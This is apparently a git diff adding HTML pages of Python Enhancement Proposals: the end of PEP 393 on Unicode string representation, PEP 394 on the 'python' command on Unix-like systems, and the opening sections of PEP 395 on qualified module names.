New API

+

This section summarizes the API additions.

+

Macros to access the internal representation of a Unicode object +(read-only):

+
    +
  • PyUnicode_IS_COMPACT_ASCII(o), PyUnicode_IS_COMPACT(o), +PyUnicode_IS_READY(o)
  • +
  • PyUnicode_GET_LENGTH(o)
  • +
  • PyUnicode_KIND(o), PyUnicode_CHARACTER_SIZE(o), +PyUnicode_MAX_CHAR_VALUE(o)
  • +
  • PyUnicode_DATA(o), PyUnicode_1BYTE_DATA(o), PyUnicode_2BYTE_DATA(o), +PyUnicode_4BYTE_DATA(o)
  • +
+

Character access macros:

+
    +
  • PyUnicode_READ(kind, data, index), PyUnicode_READ_CHAR(o, index)
  • +
  • PyUnicode_WRITE(kind, data, index, value)
  • +
+

Other macros:

+
    +
  • PyUnicode_READY(o)
  • +
  • PyUnicode_CONVERT_BYTES(from_type, to_type, begin, end, to)
  • +
+

String creation functions:

+
    +
  • PyUnicode_New(size, maxchar)
  • +
  • PyUnicode_FromKindAndData(kind, data, size)
  • +
  • PyUnicode_Substring(o, start, end)
  • +
+

Character access utility functions:

+
    +
  • PyUnicode_GetLength(o), PyUnicode_ReadChar(o, index), +PyUnicode_WriteChar(o, index, character)
  • +
  • PyUnicode_CopyCharacters(to, to_start, from, from_start, how_many)
  • +
  • PyUnicode_FindChar(str, ch, start, end, direction)
  • +
+

Representation conversion:

+
    +
  • PyUnicode_AsUCS4(o, buffer, buflen)
  • +
  • PyUnicode_AsUCS4Copy(o)
  • +
  • PyUnicode_AsUnicodeAndSize(o, size_out)
  • +
  • PyUnicode_AsUTF8(o)
  • +
  • PyUnicode_AsUTF8AndSize(o, size_out)
  • +
+

UCS4 utility functions:

+
    +
  • Py_UCS4_{strlen, strcpy, strcat, strncpy, strcmp, +strncmp, strchr, strrchr}
  • +
+
+
+

Stable ABI

+

The following functions are added to the stable ABI (PEP 384), as they +are independent of the actual representation of Unicode objects: +PyUnicode_New, PyUnicode_Substring, PyUnicode_GetLength, +PyUnicode_ReadChar, PyUnicode_WriteChar, PyUnicode_Find, +PyUnicode_FindChar.

+
+
+

GDB Debugging Hooks

+

Tools/gdb/libpython.py contains debugging hooks that embed knowledge +about the internals of CPython’s data types, including PyUnicodeObject +instances. It has been updated to track the change.

+
+
+

Deprecations, Removals, and Incompatibilities

+

While the Py_UNICODE representation and APIs are deprecated with this +PEP, no removal of the respective APIs is scheduled. The APIs should +remain available at least five years after the PEP is accepted; before +they are removed, existing extension modules should be studied to find +out whether a sufficient majority of the open-source code on PyPI has +been ported to the new API. A reasonable motivation for using the +deprecated API even in new code is code that needs to work on both +Python 2 and Python 3.

+

The following macros and functions are deprecated:

+
    +
  • PyUnicode_FromUnicode
  • +
  • PyUnicode_GET_SIZE, PyUnicode_GetSize, PyUnicode_GET_DATA_SIZE,
  • +
  • PyUnicode_AS_UNICODE, PyUnicode_AsUnicode, PyUnicode_AsUnicodeAndSize
  • +
  • PyUnicode_COPY, PyUnicode_FILL, PyUnicode_MATCH
  • +
  • PyUnicode_Encode, PyUnicode_EncodeUTF7, PyUnicode_EncodeUTF8, +PyUnicode_EncodeUTF16, PyUnicode_EncodeUTF32, +PyUnicode_EncodeUnicodeEscape, PyUnicode_EncodeRawUnicodeEscape, +PyUnicode_EncodeLatin1, PyUnicode_EncodeASCII, +PyUnicode_EncodeCharmap, PyUnicode_TranslateCharmap, +PyUnicode_EncodeMBCS, PyUnicode_EncodeDecimal, +PyUnicode_TransformDecimalToASCII
  • +
  • Py_UNICODE_{strlen, strcat, strcpy, strcmp, strchr, strrchr}
  • +
  • PyUnicode_AsUnicodeCopy
  • +
  • PyUnicode_GetMax
  • +
+

_PyUnicode_AsDefaultEncodedString is removed. It previously returned a +borrowed reference to a UTF-8-encoded bytes object. Since the unicode +object can no longer cache such a reference, implementing it without +leaking memory is not possible. No deprecation phase is provided, +since it was an API for internal use only.

+

Extension modules using the legacy API may inadvertently call +PyUnicode_READY, by calling some API that requires that the object is +ready, and then continue accessing the (now invalid) Py_UNICODE +pointer. Such code will break with this PEP. The code was already +flawed in 3.2, as there was no explicit guarantee that the +PyUnicode_AS_UNICODE result would stay valid after an API call (due to +the possibility of string resizing). Modules that face this issue +need to re-fetch the Py_UNICODE pointer after API calls; doing +so will continue to work correctly in earlier Python versions.

+
+
+
+

Discussion

+

Several concerns have been raised about the approach presented here:

+

It makes the implementation more complex. That’s true, but considered +worth it given the benefits.

+

The Py_UNICODE representation is not instantaneously available, +slowing down applications that request it. While this is also true, +applications that care about this problem can be rewritten to use the +data representation.

+
+

Performance

+

Performance of this patch must be considered for both memory +consumption and runtime efficiency. For memory consumption, the +expectation is that applications that have many large strings will see +a reduction in memory usage. For small strings, the effects depend on +the pointer size of the system, and the size of the Py_UNICODE/wchar_t +type. The following table demonstrates this for various small ASCII +and Latin-1 string sizes and platforms.

string  Python 3.2                        This PEP
size    16-bit wchar_t   32-bit wchar_t   ASCII            Latin-1
        32-bit  64-bit   32-bit  64-bit   32-bit  64-bit   32-bit  64-bit
1       32      64       40      64       32      56       40      80
2       40      64       40      72       32      56       40      80
3       40      64       48      72       32      56       40      80
4       40      72       48      80       32      56       48      80
5       40      72       56      80       32      56       48      80
6       48      72       56      88       32      56       48      80
7       48      72       64      88       32      56       48      80
8       48      80       64      96       40      64       48      88
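On interpreters that implement this PEP (CPython 3.3 and later), the chosen representation can be observed from Python code; the exact numbers vary with version, platform and pointer width, and will differ from the pre-implementation estimates above:

import sys

# Each string forces a different internal representation by its largest
# code point: ASCII, Latin-1, UCS-2 and UCS-4 respectively.
for s in ['abcd', 'abc\xe9', 'abc\u20ac', 'abc\U0001f600']:
    print(repr(s), sys.getsizeof(s))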

The runtime effect is significantly affected by the API being +used. After porting the relevant pieces of code to the new API, +the iobench, stringbench, and json benchmarks typically see +slowdowns of 1% to 30%; for specific benchmarks, speedups may +occur, as may significantly larger slowdowns.

+

In actual measurements of a Django application ([2]), significant +reductions of memory usage could be found. For example, the storage +for Unicode objects reduced to 2216807 bytes, down from 6378540 bytes +for a wide Unicode build, and down from 3694694 bytes for a narrow +Unicode build (all on a 32-bit system). This reduction came from the +prevalence of ASCII strings in this application; out of 36,000 strings +(with 1,310,000 chars), 35713 were ASCII strings (with 1,300,000 +chars). The sources for these strings were not further analysed; +many of them likely originate from identifiers in the library, and +string constants in Django’s source code.

+

In comparison to Python 2, both Unicode and byte strings need to be +accounted for. In the test application, Unicode and byte strings combined +had a length of 2,046,000 units (bytes/chars) in 2.x, and 2,200,000 +units in 3.x. On a 32-bit system, where the 2.x build used 32-bit +wchar_t/Py_UNICODE, the 2.x test used 3,620,000 bytes, and the 3.x +build 3,340,000 bytes. This reduction in 3.x using the PEP compared +to 2.x only occurs when comparing with a wide unicode build.

+
+
+
+

Porting Guidelines

+

Only a small fraction of C code is affected by this PEP, namely code +that needs to look “inside” unicode strings. That code doesn’t +necessarily need to be ported to this API, as the existing API will +continue to work correctly. In particular, modules that need to +support both Python 2 and Python 3 might get too complicated when +simultaneously supporting this new API and the old Unicode API.

+

In order to port modules to the new API, try to eliminate +the use of these API elements:

+
    +
  • the Py_UNICODE type,
  • +
  • PyUnicode_AS_UNICODE and PyUnicode_AsUnicode,
  • +
  • PyUnicode_GET_SIZE and PyUnicode_GetSize, and
  • +
  • PyUnicode_FromUnicode.
  • +
+

When iterating over an existing string, or looking at specific +characters, use indexing operations rather than pointer arithmetic; +indexing works well for PyUnicode_READ(_CHAR) and PyUnicode_WRITE. Use +void* as the buffer type for characters to let the compiler detect +invalid dereferencing operations. If you do want to use pointer +arithmetic (e.g. when converting existing code), use (unsigned) +char* as the buffer type, and keep the element size (1, 2, or 4) in a +variable. Notice that (1<<(kind-1)) will produce the element size +given a buffer kind.

+

When creating new strings, it was common in Python to start off with a +heuristic buffer size, and then grow or shrink if the heuristic +failed. With this PEP, this is now less practical, as you need a +heuristic not only for the length of the string, but also for the +maximum character.

+

In order to avoid heuristics, you need to make two passes over the +input: once to determine the output length, and the maximum character; +then allocate the target string with PyUnicode_New and iterate over +the input a second time to produce the final output. While this may +sound expensive, it could actually be cheaper than having to copy the +result again as in the following approach.

+

If you take the heuristic route, avoid allocating a string meant to +be resized, as resizing strings won’t work for their canonical +representation. Instead, allocate a separate buffer to collect the +characters, and then construct a unicode object from that using +PyUnicode_FromKindAndData. One option is to use Py_UCS4 as the buffer +element, assuming the worst case for character ordinals. This will +allow pointer arithmetic, but may require a lot of memory. +Alternatively, start with a 1-byte buffer, and increase the element +size as you encounter larger characters. In any case, +PyUnicode_FromKindAndData will scan over the buffer to verify the +maximum character.

+

For common tasks, direct access to the string representation may not +be necessary: PyUnicode_Find, PyUnicode_FindChar, PyUnicode_Ord, and +PyUnicode_CopyCharacters help in analyzing and creating string +objects, operating on indexes instead of data pointers.

+
+
+

References

+ +
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-0393.rst

+

Last modified: 2023-09-09 17:39:29 GMT

+ +
+ +
+ \ No newline at end of file diff --git a/pep-0394/index.html b/pep-0394/index.html new file mode 100644 index 00000000000..0e12341a015 --- /dev/null +++ b/pep-0394/index.html @@ -0,0 +1,513 @@ + PEP 394 – The “python” Command on Unix-Like Systems | peps.python.org
+
+

Python Enhancement Proposals

+ + +
+
+
+

PEP 394 – The “python” Command on Unix-Like Systems

+
+
Author:
+
Kerrick Staley <mail at kerrickstaley.com>, +Alyssa Coghlan <ncoghlan at gmail.com>, +Barry Warsaw <barry at python.org>, +Petr Viktorin <encukou at gmail.com>, +Miro Hrončok <miro at hroncok.cz>, +Carol Willing <willingc at gmail.com>
+
Status:
+
Active
+
Type:
+
Informational
+
Created:
+
02-Mar-2011
+
Post-History:
+
04-Mar-2011, 20-Jul-2011, 16-Feb-2012, 30-Sep-2014, 28-Apr-2018, +26-Jun-2019
+
Resolution:
+
Python-Dev message
+
+
+
+
Table of Contents +
+
+

Abstract

+

This PEP outlines the behavior of Python scripts when the python command +is invoked. +Depending on a distribution or system configuration, +python may or may not be installed. +If python is installed, its target interpreter may refer to python2 +or python3. +End users may be unaware of this inconsistency across Unix-like systems. +This PEP’s goal is to reduce user confusion about what python references +and what the script’s behavior will be.

+

The recommendations in the next section of this PEP will outline the behavior +when:

+
    +
  • using virtual environments
  • +
  • writing cross-platform scripts with shebangs for either python2 or python3
  • +
+

The PEP’s goal is to clarify the behavior for script end users, distribution +providers, and script maintainers / authors.

+
+
+

Recommendation

+

Our recommendations are detailed below. +We call out any expectations that these recommendations are based upon.

+
+

For Python runtime distributors

+
    +
  • We expect Unix-like software distributions (including systems like macOS and +Cygwin) to install the python2 command into the default path +whenever a version of the Python 2 interpreter is installed, and the same +for python3 and the Python 3 interpreter.
  • +
  • When invoked, python2 should run some version of the Python 2 +interpreter, and python3 should run some version of the Python 3 +interpreter.
  • +
  • If the python command is installed, it is expected to invoke either +the same version of Python as the python3 command or as the python2 +command.
  • +
  • Distributors may choose to set the behavior of the python command +as follows:
      +
    • python2,
    • +
    • python3,
    • +
    • not provide the python command, instead +allowing python to be configured by an end user or +a system administrator.
    • +
    +
  • +
  • The Python 3.x idle, pydoc, and python-config commands should +likewise be available as idle3, pydoc3, and python3-config; +Python 2.x versions as idle2, pydoc2, and python2-config. +The commands with no version number should either invoke the same version +of Python as the python command, or not be available at all.
  • +
  • When packaging third party Python scripts, distributors are encouraged to +change less specific shebangs to more specific ones. +This ensures software is used with the latest version of Python available, +and it can remove a dependency on Python 2. +The details on what specifics to set are left to the distributors, +though. Example specifics could include:
      +
    • Changing python shebangs to python3 when Python 3.x is supported.
    • +
    • Changing python shebangs to python2 when Python 3.x is not yet +supported.
    • +
    • Changing python3 shebangs to python3.8 if the software is built +with Python 3.8.
    • +
    +
  • +
  • When a virtual environment (created by the PEP 405 venv package or a +similar tool such as virtualenv or conda) is active, the python +command should refer to the virtual environment’s interpreter and should +always be available. +The python3 or python2 command (according to the environment’s +interpreter version) should also be available.
  • +
+
+
+

For Python script publishers

+
    +
  • When reinvoking the interpreter from a Python script, querying +sys.executable to avoid hardcoded assumptions regarding the +interpreter location remains the preferred approach (see the sketch +after this list).
  • +
  • Encourage your end users to use a virtual environment. +This makes the user’s environment more predictable (possibly resulting +in fewer issues), and helps avoid disrupting their system.
  • +
  • For scripts that are only expected to be run in an activated virtual +environment, shebang lines can be written as #!/usr/bin/env python, +as this instructs the script to respect the active virtual environment.
  • +
  • In cases where the script is expected to be executed outside virtual +environments, developers will need to be aware of the following +discrepancies across platforms and installation methods:
      +
    • Older Linux distributions will provide a python command that +refers to Python 2, and will likely not provide a python2 command.
    • +
    • Some newer Linux distributions will provide a python command that +refers to Python 3.
    • +
    • Some Linux distributions will not provide a python command at +all by default, but will provide a python3 command by default.
    • +
    +
  • +
  • When potentially targeting these environments, developers may either +use a Python package installation tool that rewrites shebang lines for +the installed environment, provide instructions on updating shebang lines +interactively, or else use more specific shebang lines that are +tailored to the target environment.
  • +
  • Scripts targeting both “old systems” and systems without the default +python command need to make a compromise and document this situation. +Avoiding shebangs (via the console_scripts Entry Points ([9]) or similar +means) is the recommended workaround for this problem.
  • +
  • Applications designed exclusively for a specific environment (such as +a container or virtual environment) may continue to use the python +command name.
  • +
+
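As noted in the first item above, a sketch of the sys.executable approach:

import subprocess
import sys

# Reinvoke whichever interpreter is currently running, rather than
# relying on any particular 'python' command being on PATH.
subprocess.check_call([sys.executable, '-c', 'import sys; print(sys.version)'])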
+
+

For end users of Python

+
    +
  • While far from being universally available, python remains the +preferred spelling for explicitly invoking Python, as this is the +spelling that virtual environments make consistently available +across different platforms and Python installations.
  • +
  • For software that is not distributed with (or developed for) your system, +we recommend using a virtual environment, possibly with an environment +manager like conda or pipenv, to help avoid disrupting your system +Python installation.
  • +
+

These recommendations are the outcome of the relevant python-dev discussions +in March and July 2011 ([1], [2]), February 2012 ([4]), +September 2014 ([6]), discussion on GitHub in April 2018 ([7]), +on python-dev in February 2019 ([8]), and during the PEP update review +in May/June 2019 ([10]).

+
+
+
+

History of this PEP

+

In 2011, the majority of distributions +aliased the python command to Python 2, but some started switching it to +Python 3 ([5]). As some of the former distributions did not provide a +python2 command by default, there was previously no way for Python 2 code +(or any code that invokes the Python 2 interpreter directly rather than via +sys.executable) to reliably run on all Unix-like systems without +modification, as the python command would invoke the wrong interpreter +version on some systems, and the python2 command would fail completely +on others. This PEP originally provided a very simple mechanism +to restore cross-platform support, with minimal additional work required +on the part of distribution maintainers. Simplified, the recommendation was:

+
    +
  1. The python command was preferred for code compatible with both +Python 2 and 3 (since it was available on all systems, even those that +already aliased it to Python 3).
  2. +
  3. The python command should always invoke Python 2 (to prevent +hard-to-diagnose errors when Python 2 code is run on Python 3).
  4. +
  5. The python2 and python3 commands should be available to specify +the version explicitly.
  6. +
+

However, these recommendations implicitly assumed that Python 2 would always be +available. As Python 2 is nearing its end of life in 2020 (PEP 373, PEP 404), +distributions are making Python 2 optional or removing it entirely. +This means either removing the python command or switching it to invoke +Python 3. Some distributors also decided that their users were better served by +ignoring the PEP’s original recommendations, and provided system +administrators with the freedom to configure their systems based on +the needs of their particular environment.

+
+
+

Current Rationale

+

As of 2019, activating a Python virtual environment (or its functional +equivalent) prior to script execution is one way to obtain a consistent +cross-platform and cross-distribution experience.

+

Accordingly, publishers can expect users of the software to provide a suitable +execution environment.

+
+
+

Future Changes to this Recommendation

+

This recommendation will be periodically reviewed over the next few years, +and updated when the core development team judges it appropriate. As a +point of reference, regular maintenance releases for the Python 2.7 series +will continue until January 2020.

+
+
+

Migration Notes

+

This section does not contain any official recommendations from the core +CPython developers. It’s merely a collection of notes regarding various +aspects of migrating to Python 3 as the default version of Python for a +system. They will hopefully be helpful to any distributions considering +making such a change.

+
    +
  • The main barrier to a distribution switching the python command from +python2 to python3 isn’t breakage within the distribution, but +instead breakage of private third party scripts developed by sysadmins +and other users. Updating the python command to invoke python3 +by default indicates that a distribution is willing to break such scripts +with errors that are potentially quite confusing for users that aren’t +familiar with the backwards incompatible changes in Python 3. For +example, while the change of print from a statement to a builtin +function is relatively simple for automated converters to handle, the +SyntaxError from attempting to use the Python 2 notation in Python 3 +may be confusing for users that are not aware of the change:
    $ python3 -c 'print "Hello, world!"'
    +  File "<string>", line 1
    +    print "Hello, world!"
    +          ^
    +SyntaxError: Missing parentheses in call to 'print'. Did you mean print("Hello, world!")?
    +
    +
    +

    While this might be obvious for experienced Pythonistas, such scripts +might even be run by people who are not familiar with Python at all. +Avoiding breakage of such third party scripts was the key reason this +PEP used to recommend that python continue to refer to python2.

    +
  • +
  • The error message python: command not found tends to be surprisingly +actionable, even for people unfamiliar with Python.
  • +
  • The pythonX.X (e.g. python3.6) commands exist on modern systems, on +which they invoke specific minor versions of the Python interpreter. It +can be useful for distribution-specific packages to take advantage of these +utilities if they exist, since it will prevent code breakage if the default +minor version of a given major version is changed. However, scripts +intending to be cross-platform should not rely on the presence of these +utilities, but rather should be tested on several recent minor versions of +the target major version, compensating, if necessary, for the small +differences that exist between minor versions. This prevents the need for +sysadmins to install many very similar versions of the interpreter.
  • +
  • When the pythonX.X binaries are provided by a distribution, the +python2 and python3 commands should refer to one of those files +rather than being provided as a separate binary file.
  • +
  • It is strongly encouraged that distribution-specific packages use python3 +(or python2) rather than python, even in code that is not intended to +operate on other distributions. This will reduce problems if the +distribution later decides to change the version of the Python interpreter +that the python command invokes, or if a sysadmin installs a custom +python command with a different major version than the distribution +default.
  • +
  • If the above point is adhered to and sysadmins are permitted to change the +python command, then the python command should always be implemented +as a link to the interpreter binary (or a link to a link) and not vice +versa. That way, if a sysadmin does decide to replace the installed +python file, they can do so without inadvertently deleting the +previously installed binary.
  • +
  • Even as the Python 2 interpreter becomes less common, it remains reasonable +for scripts to continue to use the python3 convention, rather than just +python.
  • +
  • If these conventions are adhered to, it will become the case that the +python command is only executed in an interactive manner as a user +convenience, or else when using a virtual environment or similar mechanism.
  • +
+
+
+

Backwards Compatibility

+

A potential problem can arise if a script adhering to the +python2/python3 convention is executed on a system not supporting +these commands. This is mostly a non-issue, since the sysadmin can simply +create these symbolic links and avoid further problems. It is a significantly +more obvious breakage than the sometimes cryptic errors that can arise when +attempting to execute a script containing Python 2 specific syntax with a +Python 3 interpreter or vice versa.

+
+
+

Application to the CPython Reference Interpreter

+

While technically a new feature, the make install and make bininstall +commands in the 2.7 version of CPython were adjusted to create the +following chains of symbolic links in the relevant bin directory (the +final item listed in the chain is the actual installed binary, preceding +items are relative symbolic links):

+
python -> python2 -> python2.7
+python-config -> python2-config -> python2.7-config
+
+
+

Similar adjustments were made to the macOS binary installer.

+

This feature first appeared in the default installation process in +CPython 2.7.3.

+

The installation commands in the CPython 3.x series already create the +appropriate symlinks. For example, CPython 3.2 creates:

+
python3 -> python3.2
+idle3 -> idle3.2
+pydoc3 -> pydoc3.2
+python3-config -> python3.2-config
+
+
+

And CPython 3.3 creates:

+
python3 -> python3.3
+idle3 -> idle3.3
+pydoc3 -> pydoc3.3
+python3-config -> python3.3-config
+pysetup3 -> pysetup3.3
+
+
+

The implementation progress of these features in the default installers was +managed on the tracker as issue #12627 ([3]).

+
+
+

Impact on PYTHON* Environment Variables

+

The choice of target for the python command implicitly affects a +distribution’s expected interpretation of the various Python related +environment variables. The use of *.pth files in the relevant +site-packages folder, the “per-user site packages” feature (see +python -m site) or more flexible tools such as virtualenv are all more +tolerant of the presence of multiple versions of Python on a system than the +direct use of PYTHONPATH.

+
+
+

Exclusion of MS Windows

+

This PEP deliberately excludes any proposals relating to Microsoft Windows, as +devising an equivalent solution for Windows was deemed too complex to handle +here. PEP 397 and the related discussion on the python-dev mailing list +address this issue.

+
+
+

References

+ +
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-0394.rst

+

Last modified: 2024-02-26 08:33:49 GMT

+ +
+ +
+ \ No newline at end of file diff --git a/pep-0395/index.html b/pep-0395/index.html new file mode 100644 index 00000000000..6fd012544d2 --- /dev/null +++ b/pep-0395/index.html @@ -0,0 +1,823 @@ + PEP 395 – Qualified Names for Modules | peps.python.org
+
+

Python Enhancement Proposals

+ + +
+
+
+

PEP 395 – Qualified Names for Modules

+
+
Author:
+
Alyssa Coghlan <ncoghlan at gmail.com>
+
Status:
+
Withdrawn
+
Type:
+
Standards Track
+
Created:
+
04-Mar-2011
+
Python-Version:
+
3.4
+
Post-History:
+
05-Mar-2011, 19-Nov-2011
+
+
+
+
Table of Contents +
+
+

PEP Withdrawal

+

This PEP was withdrawn by the author in December 2013, as other significant +changes in the time since it was written have rendered several aspects +obsolete. Most notably PEP 420 namespace packages rendered some of the +proposals related to package detection unworkable and PEP 451 module +specifications resolved the multiprocessing issues and provide a possible +means to tackle the pickle compatibility issues.

+

A future PEP to resolve the remaining issues would still be appropriate, +but it’s worth starting any such effort as a fresh PEP restating the +remaining problems in an updated context rather than trying to build on +this one directly.

+
+
+

Abstract

+

This PEP proposes new mechanisms that eliminate some longstanding traps for +the unwary when dealing with Python’s import system, as well as serialisation +and introspection of functions and classes.

+

It builds on the “Qualified Name” concept defined in PEP 3155.

+
+

Relationship with Other PEPs

+

Most significantly, this PEP is currently deferred as it requires +significant changes in order to be made compatible with the removal +of mandatory __init__.py files in PEP 420 (which has been implemented +and released in Python 3.3).

+

This PEP builds on the “qualified name” concept introduced by PEP 3155, and +also shares in that PEP’s aim of fixing some ugly corner cases when dealing +with serialisation of arbitrary functions and classes.

+

It also builds on PEP 366, which took initial tentative steps towards making +explicit relative imports from the main module work correctly in at least +some circumstances.

+

Finally, PEP 328 eliminated implicit relative imports from imported modules. +This PEP proposes that the de facto implicit relative imports from main +modules that are provided by the current initialisation behaviour for +sys.path[0] also be eliminated.

+
+
+
+

What’s in a __name__?

+

Over time, a module’s __name__ attribute has come to be used to handle a +number of different tasks.

+

The key use cases identified for this module attribute are (a short illustrative sketch follows the list):

+
    +
  1. Flagging the main module in a program, using the if __name__ == +"__main__": convention.
  2. +
  3. As the starting point for relative imports
  4. +
  5. To identify the location of function and class definitions within the +running application
  6. +
  7. To identify the location of classes for serialisation into pickle objects +which may be shared with other interpreter instances
  8. +
+
+
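
A minimal sketch of how the first, third and fourth use cases appear in ordinary code (the module contents here are purely illustrative):

class Widget:
    pass

# Use cases 3 and 4: __name__ seeds the __module__ attribute that
# introspection and pickling rely on to locate the definition.
assert Widget.__module__ == __name__

# Use case 1: flag the main module in a program.
if __name__ == "__main__":
    print("Widget is defined in", Widget.__module__)
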
+

Traps for the Unwary

+

The overloading of the semantics of __name__, along with some historically +associated behaviour in the initialisation of sys.path[0], has resulted in +several traps for the unwary. These traps can be quite annoying in practice, +as they are highly unobvious (especially to beginners) and can cause quite +confusing behaviour.

+
+

Why are my imports broken?

+

There’s a general principle that applies when modifying sys.path: never +put a package directory directly on sys.path. The reason this is +problematic is that every module in that directory is now potentially +accessible under two different names: as a top level module (since the +package directory is on sys.path) and as a submodule of the package (if +the higher level directory containing the package itself is also on +sys.path).

+

As an example, Django (up to and including version 1.3) is guilty of setting +up exactly this situation for site-specific applications - the application +ends up being accessible as both app and site.app in the module +namespace, and these are actually two different copies of the module. This +is a recipe for confusion if there is any meaningful mutable module level +state, so this behaviour is being eliminated from the default site set up in +version 1.4 (site-specific apps will always be fully qualified with the site +name).

+

However, it’s hard to blame Django for this, when the same part of Python +responsible for setting __name__ = "__main__" in the main module commits +the exact same error when determining the value for sys.path[0].

+

The impact of this can be seen relatively frequently if you follow the +“python” and “import” tags on Stack Overflow. When I had the time to follow +it myself, I regularly encountered people struggling to understand the +behaviour of straightforward package layouts like the following (I actually +use package layouts along these lines in my own projects):

+
project/
+    setup.py
+    example/
+        __init__.py
+        foo.py
+        tests/
+            __init__.py
+            test_foo.py
+
+
+

While I would often see it without the __init__.py files first, that’s a +trivial fix to explain. What’s hard to explain is that all of the following +ways to invoke test_foo.py probably won’t work due to broken imports +(either failing to find example for absolute imports, complaining +about relative imports in a non-package or beyond the toplevel package for +explicit relative imports, or issuing even more obscure errors if some other +submodule happens to shadow the name of a top-level module, such as an +example.json module that handled serialisation or an +example.tests.unittest test runner):

+
# These commands will most likely *FAIL*, even if the code is correct
+
+# working directory: project/example/tests
+./test_foo.py
+python test_foo.py
+python -m example.tests.test_foo
+python -c "from example.tests.test_foo import main; main()"
+
+# working directory: project/example
+tests/test_foo.py
+python tests/test_foo.py
+python -m example.tests.test_foo
+python -c "from example.tests.test_foo import main; main()"
+
+# working directory: project
+example/tests/test_foo.py
+python example/tests/test_foo.py
+
+# working directory: project/..
+project/example/tests/test_foo.py
+python project/example/tests/test_foo.py
+# The -m and -c approaches don't work from here either, but the failure
+# to find 'example' correctly is easier to explain in this case
+
+
+

That’s right, that long list is of all the methods of invocation that will +almost certainly break if you try them, and the error messages won’t make +any sense if you’re not already intimately familiar not only with the way +Python’s import system works, but also with how it gets initialised.

+

For a long time, the only way to get sys.path right with that kind of +setup was to either set it manually in test_foo.py itself (hardly +something a novice, or even many veteran, Python programmers are going to +know how to do) or else to make sure to import the module instead of +executing it directly:

+
# working directory: project
+python -c "from package.tests.test_foo import main; main()"
+
+
+

Since the implementation of PEP 366 (which defined a mechanism that allows +relative imports to work correctly when a module inside a package is executed +via the -m switch), the following also works properly:

+
# working directory: project
+python -m example.tests.test_foo
+
+
+

The fact that most methods of invoking Python code from the command line +break when that code is inside a package, and the two that do work are highly +sensitive to the current working directory is all thoroughly confusing for a +beginner. I personally believe it is one of the key factors leading +to the perception that Python packages are complicated and hard to get right.

+

This problem isn’t even limited to the command line - if test_foo.py is +open in Idle and you attempt to run it by pressing F5, or if you try to run +it by clicking on it in a graphical file browser, then it will fail in just +the same way it would if run directly from the command line.

+

There’s a reason the general “no package directories on sys.path” +guideline exists, and the fact that the interpreter itself doesn’t follow +it when determining sys.path[0] is the root cause of all sorts of grief.

+

In the past, this couldn’t be fixed due to backwards compatibility concerns. +However, scripts potentially affected by this problem will already require +fixes when porting to the Python 3.x (due to the elimination of implicit +relative imports when importing modules normally). This provides a convenient +opportunity to implement a corresponding change in the initialisation +semantics for sys.path[0].

+
+
+

Importing the main module twice

+

Another venerable trap is the issue of importing __main__ twice. This +occurs when the main module is also imported under its real name, effectively +creating two instances of the same module under different names.

+

If the state stored in __main__ is significant to the correct operation +of the program, or if there is top-level code in the main module that has +non-idempotent side effects, then this duplication can cause obscure and +surprising errors.

+
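
A small, hypothetical demonstration of the trap (the module name echo.py is illustrative only):

# echo.py - run directly via "python echo.py"
import sys

calls = []  # mutable module level state

def record(entry):
    calls.append(entry)

if __name__ == "__main__":
    import echo              # loads a *second* copy of this file
    record("via __main__")
    echo.record("via echo")
    print(sys.modules["__main__"] is sys.modules["echo"])  # False
    print(calls)             # ['via __main__'] - the state has been split
    print(echo.calls)        # ['via echo']
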
+
+

In a bit of a pickle

+

Something many users may not realise is that the pickle module sometimes +relies on the __module__ attribute when serialising instances of arbitrary +classes. So instances of classes defined in __main__ are pickled that way, +and won’t be unpickled correctly by another python instance that only imported +that module instead of running it directly. This behaviour is the underlying +reason for the advice from many Python veterans to do as little as possible +in the __main__ module in any application that involves any form of +object serialisation and persistence.

+
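
The effect is straightforward to reproduce; this sketch assumes a hypothetical script myscript.py that is executed directly:

# myscript.py - run via "python myscript.py"
import pickle

class C:
    pass

if __name__ == "__main__":
    data = pickle.dumps(C())
    # The pickle stream records the class location as __main__.C rather
    # than myscript.C, so an interpreter that merely does
    # "import myscript" cannot find the class when unpickling.
    print(b"__main__" in data)  # True
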

Similarly, when creating a pseudo-module (see next paragraph), pickles rely +on the name of the module where a class is actually defined, rather than the +officially documented location for that class in the module hierarchy.

+

For the purposes of this PEP, a “pseudo-module” is a package designed like +the Python 3.2 unittest and concurrent.futures packages. These +packages are documented as if they were single modules, but are in fact +internally implemented as packages. This is supposed to be an +implementation detail that users and other implementations don’t need to +worry about, but, thanks to pickle (and serialisation in general), +the details are often exposed and can effectively become part of the public +API.

+

While this PEP focuses specifically on pickle as the principal +serialisation scheme in the standard library, this issue may also affect +other mechanisms that support serialisation of arbitrary class instances +and rely on __module__ attributes to determine how to handle +deserialisation.

+
+
+

Where’s the source?

+

Some sophisticated users of the pseudo-module technique described +above recognise the problem with implementation details leaking out via the +pickle module, and choose to address it by altering __name__ to refer +to the public location for the module before defining any functions or classes +(or else by modifying the __module__ attributes of those objects after +they have been defined).

+

This approach is effective at eliminating the leakage of information via +pickling, but comes at the cost of breaking introspection for functions and +classes (as their __module__ attribute now points to the wrong place).

+
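
A sketch of that technique and the introspection cost it incurs (the package layout mypkg/_impl.py is hypothetical):

# mypkg/_impl.py - implementation detail of the "mypkg" pseudo-module
__name__ = "mypkg"  # claim the public location before any definitions

class Thing:
    pass

# Pickling now records "mypkg.Thing" (the desired public name), but
# Thing.__module__ == "mypkg", so tools such as inspect.getsource()
# will look in mypkg/__init__.py instead of mypkg/_impl.py.
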
+
+

Forkless Windows

+

To get around the lack of os.fork on Windows, the multiprocessing +module attempts to re-execute Python with the same main module, but skipping +over any code guarded by if __name__ == "__main__": checks. It does the +best it can with the information it has, but is forced to make assumptions +that simply aren’t valid whenever the main module isn’t an ordinary directly +executed script or top-level module. Packages and non-top-level modules +executed via the -m switch, as well as directly executed zipfiles or +directories, are likely to make multiprocessing on Windows do the wrong thing +(either quietly or noisily, depending on application details) when spawning a +new process.

+

While this issue currently only affects Windows directly, it also impacts +any proposals to provide Windows-style “clean process” invocation via the +multiprocessing module on other platforms.

+
+
+
+

Qualified Names for Modules

+

To make it feasible to fix these problems once and for all, it is proposed +to add a new module level attribute: __qualname__. This abbreviation of +“qualified name” is taken from PEP 3155, where it is used to store the naming +path to a nested class or function definition relative to the top level +module.

+

For modules, __qualname__ will normally be the same as __name__, just +as it is for top-level functions and classes in PEP 3155. However, it will +differ in some situations so that the above problems can be addressed.

+

